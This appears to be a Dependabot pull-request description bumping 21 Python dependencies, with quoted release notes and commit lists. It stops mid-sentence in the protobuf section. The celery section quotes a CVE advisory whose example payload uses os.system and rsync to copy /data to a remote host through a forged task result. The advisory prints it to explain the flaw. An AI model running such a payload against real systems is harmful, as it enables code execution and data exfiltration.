Bump the pip group across 1 directory with 21 updates

[dependabot]

Bumps the pip group with 21 updates in the /requirements directory:

Package	From	To
babel	0.9.6	2.9.1
bleach	1.4	3.3.0
celery	3.0.24	5.2.2
django	1.6.2	3.2.25
django-filter	0.7	2.4.0
djangorestframework	2.3.12	3.11.2
gitpython	0.1.7	3.1.41
gunicorn	0.17.4	22.0.0
html5lib	0.999	0.999999999
httplib2	0.8.0	0.19.0
oauth2	1.5.211	1.9.0.post1
protobuf	2.5.0	3.18.3
pymysql	0.5	1.1.1
requests	2.0.0	2.32.2
suds	0.4	1.0.0
psutil	0.2.0	5.6.6
jinja2	2.7.2	3.1.4
lxml	2.2.6	4.9.1
pillow	2.3.0	10.3.0
simplejson	2.3.2	2.6.1
django-debug-toolbar	1.2	1.11.1

Updates babel from 0.9.6 to 2.9.1

Release notes

Sourced from babel's releases.

Version 2.9.1

Bugfixes

• The internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory. Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!

Version 2.9.0

Upcoming version support changes

• This version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.

Improvements

• CLDR: Use CLDR 37 – Aarni Koskela (#734)
• Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (#741)
• Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (#726)

Bugfixes

• Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela
• Import: Simplify iteration code in "import_cldr.py" – Felix Schwarz
• Import: Stop using deprecated ElementTree methods "getchildren()" and "getiterator()" – Felix Schwarz
• Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen
• Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen
• Tests: fix tests when using Python 3.9 – Felix Schwarz
• Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne
• Tests: Support Py.test 6.x – Aarni Koskela
• Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (#724)
• Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok

Documentation

• Update parse_number comments – Brad Martin (#708)
• Add iter to Catalog documentation – @​CyanNani123

Version 2.8.1

This patch version only differs from 2.8.0 in that it backports in #752.

Version 2.8.0

Improvements

• CLDR: Upgrade to CLDR 36.0 - Aarni Koskela (#679)
• Messages: Don't even open files with the "ignore" extraction method - @​sebleblanc (#678)

Bugfixes

• Numbers: Fix formatting very small decimals when quantization is disabled - Lev Lybin, @​miluChen (#662)
• Messages: Attempt to sort all messages – Mario Frasca (#651, #606)

Docs

... (truncated)

Changelog

Sourced from babel's changelog.

Version 2.9.1

Bugfixes

* The internal locale-data loading functions now validate the name of the locale file to be loaded and only
  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!
Version 2.9.0
Upcoming version support changes

• This version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.

Improvements

* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)
* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)
* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)
Bugfixes

* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela
* Import: Simplify iteration code in "import_cldr.py" – Felix Schwarz
* Import: Stop using deprecated ElementTree methods "getchildren()" and "getiterator()" – Felix Schwarz
* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen
* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen
* Tests: fix tests when using Python 3.9 – Felix Schwarz
* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne
* Tests: Support Py.test 6.x – Aarni Koskela
* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)
* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok
Documentation

</code></pre>

<ul>

<li>Update parse_number comments – Brad Martin (:gh:<code>708</code>)</li>

<li>Add <strong>iter</strong> to Catalog documentation – <a href="https://github.com/CyanNani123&quot;&gt;&lt;code&gt;@​CyanNani123&lt;/code&gt;&lt;/a&gt;&lt;/li>

</ul>

<h2>Version 2.8.1</h2>

<p>This is solely a patch release to make running tests on Py.test 6+ possible.</p>

<p>Bugfixes</p>

<!-- raw HTML omitted -->

</blockquote>

<p>... (truncated)</p>

</details>

<details>

<summary>Commits</summary>
<ul>

<li>See full diff in <a href="https://github.com/python-babel/babel/commits/v2.9.1&quot;&gt;compare view</a></li>

</ul>

</details>
<br />


Updates bleach from 1.4 to 3.3.0

Changelog
Sourced from bleach's changelog.

Version 3.3.0 (February 1st, 2021)
Backwards incompatible changes

clean escapes HTML comments even when strip_comments=False

Security fixes

Fix bug 1621692 / GHSA-m6xf-fq7q-8743. See the advisory for details.

Features
None
Bug fixes
None
Version 3.2.3 (January 26th, 2021)
Security fixes
None
Features
None
Bug fixes

fix clean and linkify raising ValueErrors for certain inputs. Thank you @​Google-Autofuzz.

Version 3.2.2 (January 20th, 2021)
Security fixes
None
Features

Migrate CI to Github Actions. Thank you @​hugovk.

Bug fixes

fix linkify raising an IndexError on certain inputs. Thank you @​Google-Autofuzz.



... (truncated)


Commits

79b7a3c Merge pull request from GHSA-vv2x-vrpj-qqpq
842fcb4 Update for v3.3.0 release
1334134 sanitizer: escape HTML comments
c045a8b Merge pull request #581 from mozilla/nit-fixes
491abb0 fix typo s/vnedoring/vendoring/
10b1c5d vendor: add html5lib-1.1.dist-info/REQUESTED
cd838c3 Merge pull request #579 from mozilla/validate-convert-entity-code-points
612b808 Update for v3.2.3 release
6879f6a html5lib_shim: validate unicode points for convert_entity
90cb80b Update for v3.2.2 release
Additional commits viewable in compare view




Updates celery from 3.0.24 to 5.2.2

Release notes
Sourced from celery's releases.

5.2.2
Release date: 2021-12-26 16:30 P.M UTC+2:00
Release by: Omer Katz


Various documentation fixes.


Fix CVE-2021-23727 (Stored Command Injection security
vulnerability).

When a task fails, the failure information is serialized in the
backend. In some cases, the exception class is only importable
from the consumer's code base. In this case, we reconstruct the
exception class so that we can re-raise the error on the process
which queried the task's result. This was introduced in #4836. If
the recreated exception type isn't an exception, this is a
security issue. Without the condition included in this patch, an
attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data") by
setting the task's result to a failure in the result backend with
the os, the system function as the exception type and the payload
rsync /data [email protected]:~/data as the exception
arguments like so:
{
      "exc_module": "os",
      'exc_type': "system",
      "exc_message": "rsync /data [email protected]:~/data"
}

According to my analysis, this vulnerability can only be exploited
if the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result. The attacker would also have to
gain access to the result backend. The severity of this security
vulnerability is low, but we still recommend upgrading.



v5.2.1
Release date: 2021-11-16 8.55 P.M UTC+6:00
Release by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.
Pass logfile to ExecStop in celery.service example systemd file.
fix: reduce latency of AsyncResult.get under gevent (#7052)
Limit redis version: <4.0.0.
Bump min kombu version to 5.2.2.
Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.



... (truncated)


Changelog
Sourced from celery's changelog.

5.2.2
:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz


Various documentation fixes.


Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:
.. code-block:: python
  {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }

According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.


.. _version-5.2.1:
5.2.1
:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.
Pass logfile to ExecStop in celery.service example systemd file.
fix: reduce latency of AsyncResult.get under gevent (#7052)
Limit redis version: <4.0.0.
Bump min kombu version to 5.2.2.



... (truncated)


Commits

b21c13d Bump version: 5.2.1 → 5.2.2
a60b486 Add changelog for 5.2.2.
3e5d630 Fix changelog formatting.
1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
2d8dbc2 Update configuration.rst
9596aba Fix typo in documentation
639ad83 update doc to reflect Celery 5.2.x (#7153)
d32356c Bump version: 5.2.0 → 5.2.1
6842a78 Merge branch 'master' of https://github.com/celery/celery
4c92cb7 changelog for v5.2.1
Additional commits viewable in compare view




Updates django from 1.6.2 to 3.2.25

Commits

c98eca3 [3.2.x] Bumped version for 3.2.25 release.
072963e [3.2.x] Fixed CVE-2024-27351 -- Prevented potential ReDoS in Truncator.words().
2ad2676 [3.2.x] Added release date for 3.2.25.
fc41af6 [3.2.x] Fixed #35172 -- Fixed intcomma for string floats.
b9170b4 [3.2.x] Added CVE-2024-24680 to security archive.
e5350a9 [3.2.x] Post release version bump.
f5c8808 [3.2.x] Bumped version for 3.2.24 release.
c1171ff [3.2.x] Fixed CVE-2024-24680 -- Mitigated potential DoS in intcomma template ...
9dc3456 [3.2.x] Added stub release notes 3.2.24.
90eae45 [3.2.x] Fixed documented alias of smart_text().
Additional commits viewable in compare view




Updates django-filter from 0.7 to 2.4.0

Release notes
Sourced from django-filter's releases.

Version 2.4.0


SECURITY: Added a MaxValueValidator to the form field for
NumberFilter. This prevents a potential DoS attack if numbers with very
large exponents were subsequently converted to integers.
The default limit value for the validator is 1e50.
The new NumberFilter.get_max_validator() allows customising the used
validator, and may return None to disable the validation entirely.


Added testing against Django 3.1 and Python 3.9.
In addition tests against Django main development branch are now required to
pass.


Version 2.3.0
https://github.com/carltongibson/django-filter/blob/master/CHANGES.rst#version-230-2020-6-5
Version 2.2
Highlights:

Added DjangoFilterBackend.get_schema_operation_parameters() for DRF 3.10+
OpenAPI schema generation. (#1086)
Added lookup_expr to MultipleChoiceFilter (#1054)
Dropped support for EOL Python 3.4

Version 2.1.0


Fixed a regression in FilterView introduced in 2.0. An empty QuerySet was
incorrectly used whenever the FilterSet was unbound (i.e. when there were
no GET parameters).  The correct, pre-2.0 behaviour is now restored.
A workaround was to set strict=False on the FilterSet. This is no
longer necessary, so you may restore strict behaviour as desired.


Added IsoDateTimeFromToRangeFilter. Allows From-To filtering using
ISO-8601 formatted dates.


Version 2.0
2.0 introduced a number of small changes and tidy-ups.
Please see the migration guide:
https://django-filter.readthedocs.io/en/master/guide/migration.html#migrating-to-2-0

Added testing for Python 3.7 (#944)
Improve exception message for invalid filter result (#943)
Test QueryDict against CSV filters (#937)
Add renderer argument to render() method of BooleanWidget (#923)
Fix lookups for reverse relationships (#915)
Refactor backend filterset instantiation (#865)
Improve view-related attribute name consistency (#867)



... (truncated)


Changelog
Sourced from django-filter's changelog.

Version 2.4.0 (2020-9-27)


SECURITY: Added a MaxValueValidator to the form field for
NumberFilter. This prevents a potential DoS attack if numbers with very
large exponents were subsequently converted to integers.
The default limit value for the validator is 1e50.
The new NumberFilter.get_max_validator() allows customising the used
validator, and may return None to disable the validation entirely.


Added testing against Django 3.1 and Python 3.9.
In addition tests against Django main development branch are now required to
pass.


Version 2.3.0 (2020-6-5)

Fixed import of FieldDoesNotExist. (#1127)
Added testing against Django 3.0. (#1125)
Declared support for, and added testing against, Python 3.8. (#1138)
Fix filterset multiple inheritance bug (#1131)
Allowed customising default lookup expression. (#1129)
Drop Django 2.1 and below (#1180)
Fixed IsoDateTimeRangeFieldTests for Django 3.1
Require tests to pass against Django master.

Version 2.2 (2019-7-16)

Added DjangoFilterBackend.get_schema_operation_parameters() for DRF 3.10+
OpenAPI schema generation. (#1086)
Added lookup_expr to MultipleChoiceFilter (#1054)
Dropped support for EOL Python 3.4

Version 2.1 (2019-1-20)


Fixed a regression in FilterView introduced in 2.0. An empty QuerySet was
incorrectly used whenever the FilterSet was unbound (i.e. when there were
no GET parameters).  The correct, pre-2.0 behaviour is now restored.
A workaround was to set strict=False on the FilterSet. This is no
longer necessary, so you may restore strict behaviour as desired.




... (truncated)


Commits

7821072 Postpone move to CalVer.
fd5824e Restore version declaration in setup.py.
c9daa68 Version 20.9.0.
c045bbe Droped using bumpversion.
b1f56ed Use single version reference from main module.
451d372 Update docs copyright year.
82c9a42 Added MaxValueValidator to NumberFilter.
2ebce74 Confirmed compatibility with Python 3.9. (#1270)
85c9572 Run tests with GitHub Actions
d9f389f Update Jinja test dependency.
Additional commits viewable in compare view




Updates djangorestframework from 2.3.12 to 3.11.2

Release notes
Sourced from djangorestframework's releases.

Version 3.9.3
This is the last Django REST Framework release that will support Python 2.
Be sure to upgrade to Python 3 before upgrading to Django REST Framework 3.10.

Adjusted the compat check for django-guardian to allow the last guardian
version (v1.4.9) compatible with Python 2. #6613

Version 3.9.2
See Release Notes for details.
Version 3.9.1
Change Notes:
https://www.django-rest-framework.org/community/release-notes/#39x-series
Verision 3.9.0
Release announcement:
https://www.django-rest-framework.org/community/3.9-announcement/
Change Notes:
https://www.django-rest-framework.org/community/release-notes/#39x-series
Version 3.8.2
Point release for 3.8.x series

Fix read_only + default unique_together validation. #5922
authtoken.views import coreapi from rest_framework.compat, not directly. #5921
Docs: Add missing argument 'detail' to Route #5920

Version 3.8.1


Use old url_name behavior in route decorators #5915
For list_route and detail_route maintain the old behavior of url_name,
basing it on the url_path instead of the function name.


Version 3.8


Release Announcement


3.8.0 Milestone


Breaking Change: Alter read_only plus default behaviour. #5886
read_only fields will now always be excluded from writable fields.
Previously read_only fields with a default value would use the default for create and update operations.
In order to maintain the old behaviour you may need to pass the value of read_only fields when calling save() in
the view:
  def perform_create(self, serializer):
      serializer.save(owner=self.request.user)





... (truncated)


Commits

4121b01 Deprecate urlize_quoted_links in favor of Django's built-in urlize
f3d9d68 Version 3.11.1
eb2c4c2 Version 3.11.1
de497a9 Version 3.11 (#7083)
3c1428f Fix NotImplementedError for Field.to_internal_value and Field.to_representati...
b8c369c Fix serializer multiple inheritance bug (#6980)
7c54596 Declare Django versions in install_requires (#7063)
236667b Fix UniqueTogetherValidator with field sources (#7086)
f744da7 Improve the docstring on @​action (#6951)
de9f1d5 Followup to set_context removal (#7076)
Additional commits viewable in compare view




Updates gitpython from 0.1.7 to 3.1.41

Release notes
Sourced from gitpython's releases.

3.1.41 - fix Windows security issue
The details about the Windows security issue can be found in this advisory.
Special thanks go to @​EliahKagan who reported the issue and fixed it in a single stroke, while being responsible for an incredible amount of improvements that he contributed over the last couple of months ❤️.
What's Changed

Add __all__ in git.exc by @​EliahKagan in gitpython-developers/GitPython#1719
Set submodule update cadence to weekly by @​EliahKagan in gitpython-developers/GitPython#1721
Never modify sys.path by @​EliahKagan in gitpython-developers/GitPython#1720
Bump git/ext/gitdb from 8ec2390 to ec58b7e by @​dependabot in gitpython-developers/GitPython#1722
Revise comments, docstrings, some messages, and a bit of code by @​EliahKagan in gitpython-developers/GitPython#1725
Use zero-argument super() by @​EliahKagan in gitpython-developers/GitPython#1726
Remove obsolete note in _iter_packed_refs by @​EliahKagan in gitpython-developers/GitPython#1727
Reorganize test_util and make xfail marks precise by @​EliahKagan in gitpython-developers/GitPython#1729
Clarify license and make module top comments more consistent by @​EliahKagan in gitpython-developers/GitPython#1730
Deprecate compat.is_, rewriting all uses by @​EliahKagan in gitpython-developers/GitPython#1732
Revise and restore some module docstrings by @​EliahKagan in gitpython-developers/GitPython#1735
Make the rmtree callback Windows-only by @​EliahKagan in gitpython-developers/GitPython#1739
List all non-passing tests in test summaries by @​EliahKagan in gitpython-developers/GitPython#1740
Document some minor subtleties in test_util.py by @​EliahKagan in gitpython-developers/GitPython#1749
Always read metadata files as UTF-8 in setup.py by @​EliahKagan in gitpython-developers/GitPython#1748
Test native Windows on CI by @​EliahKagan in gitpython-developers/GitPython#1745
Test macOS on CI by @​EliahKagan in gitpython-developers/GitPython#1752
Let close_fds be True on all platforms by @​EliahKagan in gitpython-developers/GitPython#1753
Fix IndexFile.from_tree on Windows by @​EliahKagan in gitpython-developers/GitPython#1751
Remove unused TASKKILL fallback in AutoInterrupt by @​EliahKagan in gitpython-developers/GitPython#1754
Don't return with operand when conceptually void by @​EliahKagan in gitpython-developers/GitPython#1755
Group .gitignore entries by purpose by @​EliahKagan in gitpython-developers/GitPython#1758
Adding dubious ownership handling by @​marioaag in gitpython-developers/GitPython#1746
Avoid brittle assumptions about preexisting temporary files in tests by @​EliahKagan in gitpython-developers/GitPython#1759
Overhaul noqa directives by @​EliahKagan in gitpython-developers/GitPython#1760
Clarify some Git.execute kill_after_timeout limitations by @​EliahKagan in gitpython-developers/GitPython#1761
Bump actions/setup-python from 4 to 5 by @​dependabot in gitpython-developers/GitPython#1763
Don't install black on Cygwin by @​EliahKagan in gitpython-developers/GitPython#1766
Extract all "import gc" to module level by @​EliahKagan in gitpython-developers/GitPython#1765
Extract remaining local "import gc" to module level by @​EliahKagan in gitpython-developers/GitPython#1768
Replace xfail with gc.collect in TestSubmodule.test_rename by @​EliahKagan in gitpython-developers/GitPython#1767
Enable CodeQL by @​EliahKagan in gitpython-developers/GitPython#1769
Replace some uses of the deprecated mktemp function by @​EliahKagan in gitpython-developers/GitPython#1770
Bump github/codeql-action from 2 to 3 by @​dependabot in gitpython-developers/GitPython#1773
Run some Windows environment variable tests only on Windows by @​EliahKagan in gitpython-developers/GitPython#1774
Fix TemporaryFileSwap regression where file_path could not be Path by @​EliahKagan in gitpython-developers/GitPython#1776
Improve hooks tests by @​EliahKagan in gitpython-developers/GitPython#1777
Fix if items of Index is of type PathLike by @​stegm in gitpython-developers/GitPython#1778
Better document IterableObj.iter_items and improve some subclasses by @​EliahKagan in gitpython-developers/GitPython#1780
Revert "Don't install black on Cygwin" by @​EliahKagan in gitpython-developers/GitPython#1783
Add missing pip in $PATH on Cygwin CI by @​EliahKagan in gitpython-developers/GitPython#1784
Shorten Iterable docstrings and put IterableObj first by @​EliahKagan in gitpython-developers/GitPython#1785
Fix incompletely revised Iterable/IterableObj docstrings by @​EliahKagan in gitpython-developers/GitPython#1786
Pre-deprecate setting Git.USE_SHELL by @​EliahKagan in gitpython-developers/GitPython#1782



... (truncated)


Commits

f288738 bump patch level
ef3192c Merge pull request #1792 from EliahKagan/popen
1f3caa3 Further clarify comment in test_hook_uses_shell_not_from_cwd
3eb7c2a Move safer_popen from git.util to git.cmd
c551e91 Extract shared logic for using Popen safely on Windows
15ebb25 Clarify comment in test_hook_uses_shell_not_from_cwd
f44524a Avoid spurious "location may have moved" on Windows
a42ea0a Cover absent/no-distro bash.exe in hooks "not from cwd" test
7751436 Extract venv management from test_installation
66ff4c1 Omit CWD in search for bash.exe to run hooks on Windows
Additional commits viewable in compare view




Updates gunicorn from 0.17.4 to 22.0.0

Release notes
Sourced from gunicorn's releases.

Gunicorn 22.0 has been released
Gunicorn 22.0.0 has been released. This version fix the numerous security vulnerabilities. You're invited to upgrade asap your own installation.
Changes:
22.0.0 - 2024-04-17
===================

use utime to notify workers liveness
migrate setup to pyproject.toml
fix numerous security vulnerabilities in HTTP parser (closing some request smuggling vectors)
parsing additional requests is no longer attempted past unsupported request framing
on HTTP versions < 1.1 support for chunked transfer is refused (only used in exploits)
requests conflicting configured or passed SCRIPT_NAME now produce a verbose error
Trailer fields are no longer inspected for headers indicating secure scheme
support Python 3.12

** Breaking changes **

minimum version is Python 3.7
the limitations on valid characters in the HTTP method have been bounded to Internet Standards
requests specifying unsupported transfer coding (order) are refused by default (rare)
HTTP methods are no longer casefolded by default (IANA method registry contains none affected)
HTTP methods containing the number sign (#) are no longer accepted by default (rare)
HTTP versions < 1.0 or >= 2.0 are no longer accepted by default (rare, only HTTP/1.1 is supported)
HTTP versions consisting of multiple digits or containing a prefix/suffix are no longer accepted
HTTP header field names Gunicorn cannot safely map to variables are silently dropped, as in other software
HTTP headers with empty field name are refused by default (no legitimate use cases, used in exploits)
requests with both Transfer-Encoding and Content-Length are refused by default (such a message might indicate an attempt to perform request smuggling)
empty transfer codings are no longer permitted (reportedly seen with really old & broken proxies)

** SECURITY **

fix CVE-2024-1135



Documentation is available there: https://docs.gunicorn.org/en/stable/news.html
Packages: https://pypi.org/project/gunicorn/

Gunicorn 21.2.0 has been released
Gunicorn 21.2.0 has been released. This version fix the issue introduced in the threaded worker.
Changes:
21.2.0 - 2023-07-19
===================
fix thread worker: revert change considering connection as idle .
</tr></table> 


... (truncated)


Commits

f63d59e bump to 22.0
4ac81e0 Merge pull request #3175 from e-kwsm/typo
401cecf Merge pull request #3179 from dhdaines/exclude-eventlet-0360
0243ec3 fix(deps): exclude eventlet 0.36.0
628a0bc chore: fix typos
88fc4a4 Merge pull request #3131 from pajod/patch-py12-rebased
deae2fc CI: back off the agressive timeout
f470382 docs: promise 3.12 compat
5e30bfa add changelog to project.urls (updated for PEP621)
481c3f9 remove setup.cfg - overridden by pyproject.toml
Additional commits viewable in compare view




Updates html5lib from 0.999 to 0.999999999

Changelog
Sourced from html5lib's changelog.


Commits

6a73efa Yes, another release, already. :(
e0dc25f Fix attribute order to the treebuilder to be document order
a3b8252 Back to -dev
ebf6225 0.99999999 release! Let's party!
a8ba43e Merge pull request #270 from gsnedders/rename_stuff
8cb144b Update the docs after all the renaming and add CHANGES
00977d6 Rename a bunch of serializer module variables to be underscore prefixed
18a7102 Have only one set of allowed elements/attributes for the sanitizer
c4dd677 Move a whole bunch of private modules to be underscore prefixed
8db5828 Rename treewalkers.lxmletree to .etree_lxml for consistency
Additional commits viewable in compare view




Updates httplib2 from 0.8.0 to 0.19.0

Changelog
Sourced from httplib2's changelog.

0.19.0
auth: parse headers using pyparsing instead of regexp
httplib2/httplib2#182
auth: WSSE token needs to be string not bytes
httplib2/httplib2#179
0.18.1
explicit build-backend workaround for pip build isolation bug
"AttributeError: 'module' object has no attribute 'legacy'" on pip install
httplib2/httplib2#169
0.18.0
IMPORTANT security vulnerability CWE-93 CRLF injection
Force %xx quote of space, CR, LF characters in uri.
Special thanks to Recar https://github.com/Ciyfly for discrete notification.
https://cwe.mitre.org/data/definitions/93.html
0.17.4
Ship test suite in source dist
httplib2/httplib2#168
0.17.3
IronPython2.7: relative import iri2uri fixes ImportError
httplib2/httplib2#163
0.17.2
python3 + debug + IPv6 disabled: https raised
"IndexError: Replacement index 1 out of range for positional args tuple"
httplib2/httplib2#161
0.17.1
python3: no_proxy was not checked with https
httplib2/httplib2#160
0.17.0
feature: Http().redirect_codes set, works after follow(_all)_redirects check
This allows one line workaround for old gcloud library that uses 308
response without redirect semantics.
httplib2/httplib2#156
0.16.0


... (truncated)


Commits

See full diff in compare view




Updates oauth2 from 1.5.211 to 1.9.0.post1

Commits

See full diff in compare view




Updates protobuf from 2.5.0 to 3.18.3

Release notes
Sourced from protobuf's releases.

Protocol Buffers v3.18.3
C++

Reduce memory consumption of MessageSet parsing
This release addresses a Security Advisory for C++ and Python users

Protocol Buffers v3.18.2
Java

Improve performance characteristics of UnknownFieldSet parsing (#9371)

Protocol Buffers v3.18.1
Python

Update setup.py to reflect that we now require at least Python 3.5 (#8989)
Performance fix for DynamicMessage: force GetRaw() to be inlined (#9023)

Ruby

Update ruby_generator.cc to allow proto2 imports in proto3 (#9003)

Protocol Buffers v3.18.0
C++

Fix warnings raised by clang 11 (#8664)
Make StringPiece constructible from std::string_view (#8707)
Add missing capability attributes for LLVM 12 (#8714)
Stop using std::iterator (deprecated in C++17). (#8741)
Move field_access_listener from libprotobuf-lite to libprotobuf (#8775)
Fix #7047 Safely handle setlocale (#8735)
Remove deprecated version of SetTotalBytesLimit() (#8794)
Support arena allocation of google::protobuf::AnyMetadata (#8758)
Fix undefined symbol error around SharedCtor() (#8827)
Fix default value of enum(int) in json_util with proto2 (#8835)
Better Smaller ByteSizeLong
Introduce event filters for inject_field_listener_events
Reduce memory usage of DescriptorPool
For lazy fields copy serialized form when allowed.
Re-introduce the InlinedStringField class
v2 access listener
Reduce padding in the proto's ExtensionRegistry map.
GetExtension performance optimizations
Make tracker a static variable rather than call static functions
Support extensions in field access listener
Annotate MergeFrom for field access listener
Fix incomplete types for field access listener
Add map_entry/new_map_entry to SpecificField in MessageDifferencer. They
record the map items which are different in MessageDifferencer's reporter.
Reduce binary size due to fieldless proto messages
TextFormat: ParseInfoTree supports getting field end location in addition to
start.
Fix repeated enum extension size in field listener
Enable Any Text Expansion for Descriptors::DebugString()
Switch from int{8,16,32,64} to int{8,16,32,64}_t



... (truncated)


Commits

a902b39 No-op whitespace change
ae62acd Updating version.json and repo version numbers to: 18.3
f43ac49 Merge pull request #10542 from deannagarcia/3.18.x
9efdf55 Add missing includes
d1635e1 Apply patch
5b37c91 Update version.json with "lts": true (#10534)
c39d622 Merge pull request #10529 from protocolbuffers/deannagarcia-patch-5
f77d3b6 Update version.json
8178b06 Merge pull request #10503 from deannagarcia/3.18.x
24ca839 Add version file
Additional commits viewable in